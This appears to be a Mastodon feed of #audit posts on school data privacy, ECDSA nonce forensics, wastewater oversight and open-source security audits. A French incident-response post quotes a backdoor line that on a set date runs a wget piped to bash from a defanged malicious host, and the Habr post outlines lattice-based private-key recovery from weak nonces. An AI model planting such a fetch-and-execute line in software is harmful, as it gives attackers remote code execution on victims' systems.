Mastodawn

Beginning circa 2010, I would call the NYS Comptroller's Office and the NYC Comptroller's Office to request audits of the NYC Department of Education's IT security, as the 2004 audit and re-audits identified major gaps and problems. My last post criticizing the absence of any current audit was published in 2023.

They actually were conducting an audit between 2020 - 2025 and the state has just released the public part of the audit report.

Read Chalkbeat's media coverage of the audit here: https://www.chalkbeat.org/newyork/2026/05/04/state-comptroller-audit-finds-student-data-privacy-gaps-in-nyc-schools/

Read the public part of the audit report here:
https://www.osc.ny.gov/files/state-agencies/audits/pdf/sga-2026-23n6.pdf

I've posted a few comments at
https://databreaches.net/2026/05/05/nyc-public-schools-lack-central-inventory-to-track-vendors-used-by-schools-nys-auditor/

#EduSec #NYCPS #audit #NYSComptroller #databreach #infosec #cybersecurity

State audit slams NYC schools for lack of student data privacy oversight

NYC schools don’t have a clear understanding of what student data they collect or who can access it, according to a state comptroller audit. It raises concerns as more third-party platforms — including AI tools — are introduced.

Chalkbeat

Habr 12h ago

Nonce Observatory:

Nonce Observatory: как превратить цифровые подписи в систему наблюдаемых nonce-инвариантов Большинство историй про ECDSA/Schnorr nonce звучит одинаково: “повторили nonce — потеряли ключ”. Но реальные дефекты часто тоньше: короткие nonce, частичная утечка битов, смещение, recurrence, window-locality, prefix-семейства, ошибки в multi-signature контексте. Мы собрали исследовательскую систему Nonce Observatory — не “кнопку взлома”, а forensic framework для анализа слабых nonce-структур в: ECDSA • Schnorr/BIP340 • MuSig2/BIP327 Что внутри: protocol-valid bridges affine hidden-nonce families HNP / lattice routes Q-LLL + fplll same-case checks AI sidecar на gpt-oss-20b-TurboQuant-MLX-8bit exact evidence / redaction / claim boundaries full-system audit Главный принцип системы: сигнал ≠ восстановление; кандидат ≠ приватный ключ; claim принимается только если d·G == public key . В статье расскажу: — что такое HNP и зачем он нужен для ECDSA; — как подписи превращаются в affine nonce geometry; — почему BIP340 и MuSig2 требуют protocol bridge; — как Q-LLL используется как lattice backend, а не “магический oracle”; — зачем нужен AI sidecar и почему AI не имеет права принимать d ; — как мы дошли до full-range controlled HNP recovery без nonce brute force; — почему full-system audit важнее красивого demo. Это статья не про “сломать Bitcoin”. Это статья про инженерную дисциплину в криптографической форензике: наблюдаемость, воспроизводимость, проверяемость и честные границы заявлений.

https://habr.com/ru/articles/1031858/

#информационная_безопасность #биткоин #криптография #алгоритмы #nonce #ecdsa #signature #audit

Nonce Observatory:

как мы превратили подписи в систему наблюдаемых nonce-инвариантов, решёток и проверяемых forensic-отчётов Не “сломать Bitcoin”, а научиться видеть слабые nonce В криптографии есть странный класс...

Хабр

Nicolas Delsaux 23h ago

Un exemple de process de revue léger, qui semble intéressant https://mozilla.github.io/firefox-browser-architecture/text/0006-architecture-review-process.html #architecture #process #analyse #audit

Architecture Review Process

Victor 3d ago

Local advocacy group Common Ground is calling for an independent, third-party audit of Veolia, the company that holds the Milwaukee Metropolitan Sewerage District's contract to run the MMSD's two wastewater treatment plants. #audit #wastewater #permit https://www.wuwm.com/milwaukee-wastewater-whistleblower-mmsd-veolia-audit-common-ground

Common Ground calls for audit of Veolia as MMSD faces whistleblower allegations

After weeks of speculation, a whistleblower stepped forward Thursday evening. Former senior Milwaukee Metropolitan Sewerage District official shares concerns about how Milwaukee’s wastewater treatment plants are managed.

WUWM

Dave Volek 5d ago

Spolu 15: Auditing

All spolus will be occasionally audited to ensure they are following the spolu rules.

If, after a warning, the infractions are unaddressed, the spolu will revert to a corporation, with the investors taking full control:

https://www.tiereddemocraticgovernance.org/blog_details.php?blog_cat_id=19&id=350

#tiereddemocraticgovernance
#audit #auditor

OSTIF 5d ago

We are excited to announce the results of our security audit of Inspektor Gadget! With the help of @Shielder and the Cloud Native Computing Foundation (CNCF), this project received a security audit reviewing Inspektor Gadget’s core components.

Read more about the work done on the collection of open source libraries and tools for data collection and inspection of Kubernetes clusters and Linux hosts at our blog: https://ostif.org/inspektor-gadget-audit-complete/

#cncf #audit #opensource #cybersecurity #inspektorgadget

IPFire News 6d ago

We live and breathe Open Source! All parts of IPFIre are fully open and auditable at https://git.ipfire.org #opensource #git #security #audit

git.ipfire.org Git

Headlines Africa 6d ago

DR Congo president orders audit of cobalt and copper export revenues http://newsfeed.facilit8.network/TSH7Cx #DRCongo #Cobalt #Copper #FelixTshisekedi #Audit

gaby_wald 6d ago

Backdoor découverte dans logiciel client : code malveillant activé à Noël, isolement, correction, signalement CNIL/ANSSI. Leçon : audits réguliers. #CyberSécurité #Backdoor #Tech #ANSSI #CNIL #Audit ... https://www.linkedin.com/posts/gabriel-chandesris_cybersaezcuritaez-backdoor-tech-share-7455176908222275584-4_zC

#cybersécurité #backdoor #tech #anssi #cnil #audit | Gabriel C.

🕵️ "J’ai découvert une backdoor dans le logiciel d’un client. Voici comment nous avons réagi (et ce que vous devez vérifier)" **Contexte** : Lors d’un audit de routine pour un client (une PME industrielle), je suis tombé sur un **code suspect** dans leur logiciel de gestion interne. Voici ce qui s’est passé, et comment **vous pouvez éviter la même situation**. 🔹 **La découverte** : En analysant un script Python censé gérer les **factures clients**, j’ai repéré cette ligne étrange dans un fichier apparemment anodin... if datetime.datetime.now() == datetime.datetime(2023, 12, 25): os.system("wget hxxps://malveillant[.]com/fichier_malveillant.sh | bash") Un cheval de Troie programmé pour s’activer le 25 décembre (quand personne ne travaille). 🔹 Notre réaction immédiate : 1. Isolement du système : • Déconnexion immédiate du serveur du réseau. • Analyse forensique pour vérifier l’étendue de l’infection (outils : grep, lsof). 2. Recherche de l’origine : • Le code malveillant avait été injecté via une mise à jour piratée du logiciel (fournisseur tiers). • Preuve : Le fichier avait été modifié 6 mois plus tôt, mais personne ne l’avait remarqué. 3. Correction et sécurisation : • Suppression du code malveillant et retour à une version saine. • Changement de tous les mots de passe (y compris ceux des bases de données). • Mise en place d’un système de détection d’intrusion (logs + alertes automatiques). 4. Signalement aux autorités : • Dépôt de plainte auprès de la CNIL et de l’ANSSI. • Alerte au fournisseur du logiciel (qui a nié toute responsabilité… jusqu’à preuve du contraire). 💡 Leçons tirées de cet incident : • Auditez régulièrement votre code : Même les logiciels "fiables" peuvent être compromis. • Limitez les permissions : Un logiciel de facturation n’a pas besoin d’exécuter des commandes shell. • Sauvegardes = votre meilleure assurance : Sans elles, ce client aurait perdu 3 ans de données. 💬 Avez-vous déjà découvert une faille de sécurité inattendue dans un logiciel ? Comment avez-vous réagi ? #CyberSécurité #Backdoor #Tech #ANSSI #CNIL #Audit

Hans-Cees 🌳🌳🤢🦋🐈🐈🍋🍋🐝🐜Apr 28

Vandaag #trein en #audit dag #nen7510 de norm uit de #zorg
Gelukkig is de eerste klas stilte coupe er een met zittingen niet tegenover elkaar. Zo min mogelijk prikkels helpt de dag door te komen.
Hard gewerkt aan beleid, nu kijken wat de auditor gaat zeggen
#actuallyaustic